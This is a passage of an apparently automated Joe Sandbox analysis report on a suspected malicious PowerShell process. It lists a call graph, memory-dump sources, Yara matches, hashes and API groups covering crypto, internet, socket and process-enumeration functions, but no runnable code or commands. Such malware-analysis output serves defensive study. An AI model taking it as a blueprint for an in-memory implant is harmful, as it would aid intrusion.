TlsFree _mtterm 42056->42100 42060 22efa0d1a4d 42061 22efa0d1a61 42060->42061 42102 22efa0d919c 54 API calls 4 library calls 42060->42102 42067 22efa0d1a65 42061->42067 42104 22efa0d816c 11 API calls free 42061->42104 42064 22efa0d1a56 42064->42061 42103 22efa0d00ec 61 API calls 4 library calls 42064->42103 42065 22efa0d1a75 42065->42056 42067->42037 42069 22efa0c94bb 42068->42069 42072 22efa0c9402 _DllMainCRTStartup 42068->42072 42184 22efa0cb47c 42069->42184 42071 22efa0c9407 _DllMainCRTStartup 42071->42014 42072->42071 42073 22efa0c9465 _DllMainCRTStartup 42072->42073 42198 22efa0cd4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 42072->42198 42126 22efa0bca74 42073->42126 42076 22efa0c9448 42076->42073 42077 22efa0c9457 42076->42077 42078 22efa0c949f 42076->42078 42077->42073 42199 22efa0cd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 42077->42199 42078->42073 42201 22efa0cd134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 42078->42201 42081 22efa0c9487 42081->42073 42200 22efa0cd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 42081->42200 42083->42035 42084->42048 42086 22efa0d7e6f 42085->42086 42111 22efa0d4728 42086->42111 42089 22efa0d7efe GetStartupInfoW 42094 22efa0d8058 42089->42094 42095 22efa0d7f18 42089->42095 42090 22efa0d7e93 _ioinit 42090->42053 42091 22efa0d80a3 GetStdHandle 42093 22efa0d80ce GetFileType 42091->42093 42091->42094 42092 22efa0d4728 _calloc_crt 10 API calls 42092->42095 42093->42094 42094->42090 42094->42091 42097 22efa0d80fe InitializeCriticalSectionAndSpinCount 42094->42097 42095->42092 42095->42094 42096 22efa0d7f74 42095->42096 42096->42094 42098 22efa0d7ffc GetFileType 42096->42098 42099 22efa0d8006 InitializeCriticalSectionAndSpinCount 42096->42099 42097->42094 42098->42096 42098->42099 42099->42096 42101->42060 42102->42064 42103->42061 42104->42065 42105->42036 42106->42041 42110->42037 42112 22efa0d474d 42111->42112 42114 22efa0d478a 42112->42114 42115 22efa0d476b Sleep 42112->42115 42116 22efa0d9cec 42112->42116 42114->42089 42114->42090 42115->42112 42115->42114 42117 22efa0d9d01 42116->42117 42121 22efa0d9d1e 42116->42121 42118 22efa0d9d0f 42117->42118 42117->42121 42124 22efa0d1d18 10 API calls _getptd_noexit 42118->42124 42120 22efa0d9d36 HeapAlloc 42120->42121 42122 22efa0d9d14 42120->42122 42121->42120 42121->42122 42125 22efa0d1db4 DecodePointer 42121->42125 42122->42112 42124->42122 42125->42121 42202 22efa0c5fec 39 API calls 4 library calls 42126->42202 42128 22efa0bca92 _DllMainCRTStartup 42203 22efa0cf284 42128->42203 42130 22efa0bcb40 _DllMainCRTStartup 42220 22efa0cc230 51 API calls 6 library calls 42130->42220 42132 22efa0bcb87 42221 22efa0c34a0 51 API calls 2 library calls 42132->42221 42134 22efa0bcb94 42222 22efa0ceaa8 42 API calls 3 library calls 42134->42222 42136 22efa0bcbb5 42223 22efa0ceaa8 42 API calls 3 library calls 42136->42223 42138 22efa0bcbcf 42224 22efa0bf3c0 GetLocalTime _DllMainCRTStartup 42138->42224 42140 22efa0bcbd4 42142 22efa0bcbdd _DllMainCRTStartup 42140->42142 42225 22efa0cda74 23 API calls _DllMainCRTStartup 42140->42225 42143 22efa0bcbf9 42142->42143 42226 22efa0cda74 23 API calls _DllMainCRTStartup 42142->42226 42227 22efa0bf1f8 64 API calls _DllMainCRTStartup 42143->42227 42146 22efa0bcc05 42147 22efa0bcc0e 42146->42147 42228 22efa0cda74 23 API calls _DllMainCRTStartup 42146->42228 42229 22efa0bf274 66 API calls 5 library calls 42147->42229 42150 22efa0bcc13 42152 22efa0bcc1c _DllMainCRTStartup 42150->42152 42230 22efa0cda74 23 API calls _DllMainCRTStartup 42150->42230 42153 22efa0cf284 malloc 39 API calls 42152->42153 42154 22efa0bcc4f 42153->42154 42155 22efa0bcc5c _DllMainCRTStartup 42154->42155 42231 22efa0cda74 23 API calls _DllMainCRTStartup 42154->42231 42232 22efa0ceaa8 42 API calls 3 library calls 42155->42232 42158 22efa0bcc78 _DllMainCRTStartup 42233 22efa0c5c60 81 API calls 5 library calls 42158->42233 42242 22efa0c5fec 39 API calls 4 library calls 42184->42242 42186 22efa0cb4a0 _setmbcp_nolock _DllMainCRTStartup 42187 22efa0cf284 malloc 39 API calls 42186->42187 42188 22efa0cb52d _setmbcp_nolock 42187->42188 42243 22efa0ceaa8 42 API calls 3 library calls 42188->42243 42190 22efa0cb55e _DllMainCRTStartup 42196 22efa0cb575 GetPdbDllFromInstallPath _DllMainCRTStartup 42190->42196 42244 22efa0bf014 42190->42244 42192 22efa0cb802 42249 22efa0c60e0 10 API calls 2 library calls 42192->42249 42195 22efa0cf284 malloc 39 API calls 42195->42196 42196->42192 42196->42195 42248 22efa0ceaa8 42 API calls 3 library calls 42196->42248 42198->42076 42199->42081 42200->42073 42201->42073 42202->42128 42204 22efa0cf318 42203->42204 42217 22efa0cf29c 42203->42217 42240 22efa0d1db4 DecodePointer 42204->42240 42206 22efa0cf31d 42241 22efa0d1d18 10 API calls _getptd_noexit 42206->42241 42207 22efa0cf2d4 HeapAlloc 42210 22efa0cf30d 42207->42210 42207->42217 42210->42130 42211 22efa0cf2fd 42238 22efa0d1d18 10 API calls _getptd_noexit 42211->42238 42215 22efa0cf302 42239 22efa0d1d18 10 API calls _getptd_noexit 42215->42239 42217->42207 42217->42211 42217->42215 42218 22efa0cf2b4 42217->42218 42237 22efa0d1db4 DecodePointer 42217->42237 42218->42207 42234 22efa0d1df0 35 API calls 2 library calls 42218->42234 42235 22efa0d1e64 35 API calls 7 library calls 42218->42235 42236 22efa0cff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 42218->42236 42220->42132 42221->42134 42222->42136 42223->42138 42224->42140 42227->42146 42229->42150 42232->42158 42234->42218 42235->42218 42237->42217 42238->42215 42239->42210 42240->42206 42241->42210 42242->42186 42243->42190 42245 22efa0bf02f _DllMainCRTStartup 42244->42245 42246 22efa0bf058 WSAIoctl 42245->42246 42247 22efa0bf051 _DllMainCRTStartup 42245->42247 42246->42247 42247->42196 42248->42196

                                                    Executed Functions

                                                    Function 0000022EFA0B1184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$Context$Acquire$RandomRelease
                                                    • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                    • API String ID: 685801729-4046902070
                                                    • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                    • Instruction ID: e0dce4cc2a14644e0b1c9e9311bb6bda24c502039a8ef50f9b64ed6995ef0360
                                                    • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                    • Instruction Fuzzy Hash: 87018E2130064192EB10CB95F98C359A7A1F7CCB84F458421C60887F75DF7CCA59E340
                                                    Function 0000022EFA0BEA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$Option$ConnectOpenRevertSelf
                                                    • String ID:
                                                    • API String ID: 1513466045-0
                                                    • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                    • Instruction ID: bb1cd3debe3019e480fb20e441290b242909ee2c691dd24feec647ff74568fef
                                                    • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                    • Instruction Fuzzy Hash: FF41DD36604741A2EF249B91F6A8BAA6351F79DB84F020015DA4A6FFBACF3CD405A740
                                                    Function 0000022EFA0BF014 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: IoctlSocketStartupclosesocket
                                                    • String ID:
                                                    • API String ID: 365704328-0
                                                    • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                    • Instruction ID: 37be7bd6b35fde60571b749a9e6c42d2873fba7db6d50b62d02b5e69c14eb435
                                                    • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                    • Instruction Fuzzy Hash: DE21D37261478092EB208F54F69475AB794F38C7E4F514625DE9947FA5CB3CC9059B00
                                                    Function 0000022EFA0BF118 Relevance: 3.0, APIs: 2, Instructions: 42networkCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartup
                                                    • String ID:
                                                    • API String ID: 915672949-0
                                                    • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                    • Instruction ID: 743b429a6a01f2aa754972f08b7ca01f97f99139e6b4ea3ea24411af71b5055d
                                                    • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                    • Instruction Fuzzy Hash: 91111874601741A2FF28ABE0FB6C3952695E799340F43042A96150FFF7DE7D8948B710
                                                    Function 0000022EF9B296B4 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                    • Instruction ID: 64d935b796a8948b8af54684c1c5be4551e09c33a917b92f8fa5cf59113482da
                                                    • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                    • Instruction Fuzzy Hash: EC71B836219B8486CEA0CB4AE49435AB7A0F7C8B94F548125EFCE83B68DF3DD455CB04
                                                    Function 00007FFD9B961711 Relevance: .8, Instructions: 822COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 109 7ffd9b961711-7ffd9b96172b 111 7ffd9b96172d-7ffd9b961733 109->111 112 7ffd9b961736-7ffd9b961768 109->112 111->112 117 7ffd9b961770-7ffd9b9617a7 112->117 121 7ffd9b9617ad-7ffd9b9617f6 117->121 122 7ffd9b961df7-7ffd9b961e0c 117->122 127 7ffd9b96183c-7ffd9b96184b 121->127 128 7ffd9b9617f8-7ffd9b961835 121->128 129 7ffd9b96184d-7ffd9b96185a 127->129 130 7ffd9b961837 127->130 128->127 132 7ffd9b961873-7ffd9b96187e 129->132 133 7ffd9b96185c-7ffd9b961871 129->133 130->127 132->130 136 7ffd9b961880-7ffd9b96188d 132->136 133->132 138 7ffd9b96188f-7ffd9b96189c 136->138 139 7ffd9b9618a6-7ffd9b9618b1 136->139 138->139 146 7ffd9b96189e-7ffd9b9618a4 138->146 139->130 140 7ffd9b9618b3-7ffd9b9618bd 139->140 144 7ffd9b9618bf-7ffd9b9618cd 140->144 145 7ffd9b9618d7-7ffd9b9618db 140->145 144->145 150 7ffd9b9618cf-7ffd9b9618d5 144->150 145->130 148 7ffd9b9618e1-7ffd9b9618eb 145->148 146->139 151 7ffd9b961904-7ffd9b96194b 148->151 152 7ffd9b9618ed-7ffd9b9618fa 148->152 150->145 151->130 162 7ffd9b961951-7ffd9b96195b 151->162 152->151 157 7ffd9b9618fc-7ffd9b961902 152->157 157->151 163 7ffd9b96195d-7ffd9b96196b 162->163 164 7ffd9b961975-7ffd9b961981 162->164 163->164 167 7ffd9b96196d-7ffd9b961973 163->167 164->130 166 7ffd9b961987-7ffd9b961991 164->166 168 7ffd9b961993-7ffd9b9619a4 166->168 169 7ffd9b9619ab-7ffd9b9619c8 166->169 167->164 174 7ffd9b9619c9-7ffd9b961a1c 168->174 175 7ffd9b9619a6-7ffd9b9619a9 168->175 169->174 174->130 180 7ffd9b961a22-7ffd9b961a2f 174->180 175->169 181 7ffd9b961a31-7ffd9b961a46 180->181 182 7ffd9b961a48-7ffd9b961a58 180->182 181->182 182->130 183 7ffd9b961a5e-7ffd9b961a68 182->183 185 7ffd9b961a81-7ffd9b961a8d 183->185 186 7ffd9b961a6a-7ffd9b961a77 183->186 185->130 188 7ffd9b961a93-7ffd9b961a9d 185->188 186->185 190 7ffd9b961a79-7ffd9b961a7f 186->190 191 7ffd9b961a9f-7ffd9b961ab4 188->191 192 7ffd9b961ab6-7ffd9b961afd 188->192 190->185 191->192 192->130 200 7ffd9b961b03-7ffd9b961b0d 192->200 201 7ffd9b961b0f-7ffd9b961b24 200->201 202 7ffd9b961b26-7ffd9b961b32 200->202 201->202 202->130 204 7ffd9b961b38-7ffd9b961b42 202->204 205 7ffd9b961b62-7ffd9b961bfc 204->205 206 7ffd9b961b44-7ffd9b961b60 204->206 219 7ffd9b961bfe-7ffd9b961c33 205->219 220 7ffd9b961c3b-7ffd9b961c47 205->220 206->205 219->220 221 7ffd9b961e21-7ffd9b961e86 220->221 222 7ffd9b961c4d-7ffd9b961c57 220->222 242 7ffd9b961eb1-7ffd9b961ebd 221->242 243 7ffd9b961e88-7ffd9b961eae 221->243 224 7ffd9b961c59-7ffd9b961c74 222->224 225 7ffd9b961c76-7ffd9b961c82 222->225 224->225 225->221 229 7ffd9b961c88-7ffd9b961c92 225->229 231 7ffd9b961cb1-7ffd9b961cf8 229->231 232 7ffd9b961c94-7ffd9b961caf 229->232 231->221 247 7ffd9b961cfe-7ffd9b961d08 231->247 232->231 243->242 249 7ffd9b961d0a-7ffd9b961d25 247->249 250 7ffd9b961d27-7ffd9b961d33 247->250 249->250 250->221 252 7ffd9b961d39-7ffd9b961d46 250->252 253 7ffd9b961d65-7ffd9b961db2 252->253 254 7ffd9b961d48-7ffd9b961d63 252->254 253->122 254->253
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4123671244.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e470f4a2a1087fd1e316c24ed9a0eb322546c85e9dc4b358ba5a119388b76d31
                                                    • Instruction ID: 016a1d9e89d3fc6bbbf3bbf5fe11c50e3c18476c5c778f07a4752db03dfaeed4
                                                    • Opcode Fuzzy Hash: e470f4a2a1087fd1e316c24ed9a0eb322546c85e9dc4b358ba5a119388b76d31
                                                    • Instruction Fuzzy Hash: 50421471B1EA8D9FEBA9EB68886457877E1EF55308B1900BED01DC71E3DE25AC42C341
                                                    Function 00007FFD9B894045 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 313 7ffd9b894045-7ffd9b894056 314 7ffd9b894058-7ffd9b894059 313->314 315 7ffd9b89405c-7ffd9b89408c 313->315 314->315 317 7ffd9b894091-7ffd9b8940aa 315->317
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4123209199.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 766642d8149fbb2b3da10932499c4e1c0848f95b82c1e9c2643841360af33d23
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 1201A73020CB0C8FDB48EF0CE451AA5B7E0FB89320F10056DE58AC36A1D632E881CB41

                                                    Non-executed Functions

                                                    Function 0000022EFA0D6514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 565 22efa0d6514-22efa0d655c call 22efa0d0ac0 568 22efa0d6565-22efa0d6568 565->568 569 22efa0d655e-22efa0d6560 565->569 571 22efa0d656a-22efa0d6584 call 22efa0d1ca8 call 22efa0d1d18 call 22efa0d2340 568->571 572 22efa0d6589-22efa0d65bb 568->572 570 22efa0d6c26-22efa0d6c4f call 22efa0d7e20 569->570 571->570 574 22efa0d65bd-22efa0d65c4 572->574 575 22efa0d65c6-22efa0d65cc 572->575 574->571 574->575 578 22efa0d65db-22efa0d65e4 call 22efa0d99bc 575->578 579 22efa0d65ce-22efa0d65d6 call 22efa0d7cec 575->579 586 22efa0d65ea-22efa0d65fb 578->586 587 22efa0d68a6-22efa0d68b7 578->587 579->578 586->587 589 22efa0d6601-22efa0d6635 call 22efa0d5844 GetConsoleMode 586->589 590 22efa0d68bd-22efa0d68c9 587->590 591 22efa0d6b88-22efa0d6ba4 call 22efa0e2300 587->591 589->587 604 22efa0d663b-22efa0d663d 589->604 595 22efa0d6997-22efa0d699b 590->595 596 22efa0d68cf-22efa0d68d2 590->596 606 22efa0d6ba6-22efa0d6bac 591->606 607 22efa0d6bae-22efa0d6bb4 GetLastError 591->607 598 22efa0d6a76-22efa0d6a79 595->598 599 22efa0d69a1-22efa0d69a4 595->599 601 22efa0d6be6-22efa0d6bfc 596->601 602 22efa0d68d8 596->602 598->601 603 22efa0d6a7f 598->603 599->601 605 22efa0d69aa 599->605 608 22efa0d6c08-22efa0d6c18 call 22efa0d1d18 call 22efa0d1ca8 601->608 609 22efa0d6bfe-22efa0d6c02 601->609 610 22efa0d68db-22efa0d68e6 602->610 611 22efa0d6a85-22efa0d6a8a 603->611 612 22efa0d6648-22efa0d665c GetConsoleCP 604->612 613 22efa0d663f-22efa0d6642 604->613 614 22efa0d69af-22efa0d69ba 605->614 615 22efa0d6bb6-22efa0d6bb8 606->615 607->615 623 22efa0d6c20-22efa0d6c24 608->623 609->569 609->608 617 22efa0d68e8-22efa0d68f1 610->617 618 22efa0d6a8c-22efa0d6a95 611->618 620 22efa0d689d-22efa0d68a1 612->620 621 22efa0d6662-22efa0d6665 612->621 613->587 613->612 619 22efa0d69bc-22efa0d69c5 614->619 622 22efa0d6bba-22efa0d6bbc 615->622 615->623 625 22efa0d6919-22efa0d695c call 22efa0e2300 617->625 626 22efa0d68f3-22efa0d68fc 617->626 627 22efa0d6a97-22efa0d6aa4 618->627 628 22efa0d6ac6-22efa0d6b0f WideCharToMultiByte 618->628 629 22efa0d69c7-22efa0d69d4 619->629 630 22efa0d69f8-22efa0d6a3b call 22efa0e2300 619->630 620->622 631 22efa0d666b-22efa0d668a 621->631 632 22efa0d67ef-22efa0d67f4 621->632 622->601 633 22efa0d6bbe-22efa0d6bc1 622->633 623->570 625->607 659 22efa0d6962-22efa0d6978 625->659 635 22efa0d6908-22efa0d6917 626->635 636 22efa0d68fe-22efa0d6905 626->636 640 22efa0d6aa6-22efa0d6aae 627->640 641 22efa0d6ab2-22efa0d6ac4 627->641 628->607 642 22efa0d6b15 628->642 643 22efa0d69d6-22efa0d69e0 629->643 644 22efa0d69e4-22efa0d69f6 629->644 630->607 668 22efa0d6a41-22efa0d6a57 630->668 645 22efa0d66ac-22efa0d66b6 call 22efa0d8738 631->645 646 22efa0d668c-22efa0d66aa 631->646 638 22efa0d67f6-22efa0d6812 632->638 639 22efa0d6814 632->639 647 22efa0d6bda-22efa0d6be1 call 22efa0d1cc8 633->647 648 22efa0d6bc3-22efa0d6bd3 call 22efa0d1d18 call 22efa0d1ca8 633->648 635->617 635->625 636->635 652 22efa0d6819-22efa0d681e 638->652 639->652 640->641 641->618 641->628 658 22efa0d6b17-22efa0d6b51 call 22efa0e2300 642->658 643->644 644->619 644->630 671 22efa0d66ec-22efa0d66f2 645->671 672 22efa0d66b8-22efa0d66c5 645->672 653 22efa0d66f5-22efa0d6702 call 22efa0dadec 646->653 647->601 648->647 663 22efa0d685f 652->663 664 22efa0d6820 652->664 678 22efa0d6708-22efa0d6745 WideCharToMultiByte 653->678 679 22efa0d6894-22efa0d6898 653->679 681 22efa0d6b53-22efa0d6b5d 658->681 682 22efa0d6b61-22efa0d6b69 GetLastError 658->682 659->615 660 22efa0d697e-22efa0d698c 659->660 660->610 669 22efa0d6992 660->669 674 22efa0d6864-22efa0d686c 663->674 670 22efa0d6825 call 22efa0dadf4 664->670 668->615 675 22efa0d6a5d-22efa0d6a6b 668->675 669->615 680 22efa0d682a-22efa0d682f 670->680 671->653 683 22efa0d66cb-22efa0d66e1 call 22efa0dadec 672->683 684 22efa0d6873-22efa0d688b 672->684 674->679 686 22efa0d686e 674->686 675->614 687 22efa0d6a71 675->687 678->679 690 22efa0d674b-22efa0d677a call 22efa0e2300 678->690 679->615 680->607 688 22efa0d6835-22efa0d683b 680->688 681->658 691 22efa0d6b5f 681->691 692 22efa0d6b6d-22efa0d6b6f 682->692 683->679 699 22efa0d66e7-22efa0d66ea 683->699 684->679 686->621 687->615 688->663 696 22efa0d683d-22efa0d6844 688->696 690->607 701 22efa0d6780-22efa0d678e 690->701 691->692 692->615 694 22efa0d6b71-22efa0d6b80 692->694 694->611 697 22efa0d6b86 694->697 698 22efa0d6849 call 22efa0dadf4 696->698 697->615 702 22efa0d684e-22efa0d6853 698->702 699->678 701->679 704 22efa0d6794-22efa0d679e 701->704 702->607 703 22efa0d6859-22efa0d685b 702->703 703->663 704->674 705 22efa0d67a4-22efa0d67d6 call 22efa0e2300 704->705 705->607 708 22efa0d67dc-22efa0d67e1 705->708 708->679 709 22efa0d67e7-22efa0d67ed 708->709 709->674
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                    • String ID: U
                                                    • API String ID: 3902385426-4171548499
                                                    • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                    • Instruction ID: aabf93859eada7bb4af38d499ea594e99353ba957451c96b680afea2ccca6937
                                                    • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                    • Instruction Fuzzy Hash: 1612E333624641A6EF208FA8F68835A77A1F78C754F520116EA894BFB5DF3DC485EB10
                                                    Function 0000022EFA0C867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                                    • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                    • API String ID: 718051232-1833344708
                                                    • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                    • Instruction ID: 52f183691cf6e9bcb460890cda8940e7ae5c64d535038e925f8c3bd6c0759468
                                                    • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                    • Instruction Fuzzy Hash: 9582F411B04641B2FE68DBE6B76C7A912D0A78D780F964111DA0A8FFF6EE3CC546B704
                                                    Function 0000022EFA0D2F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
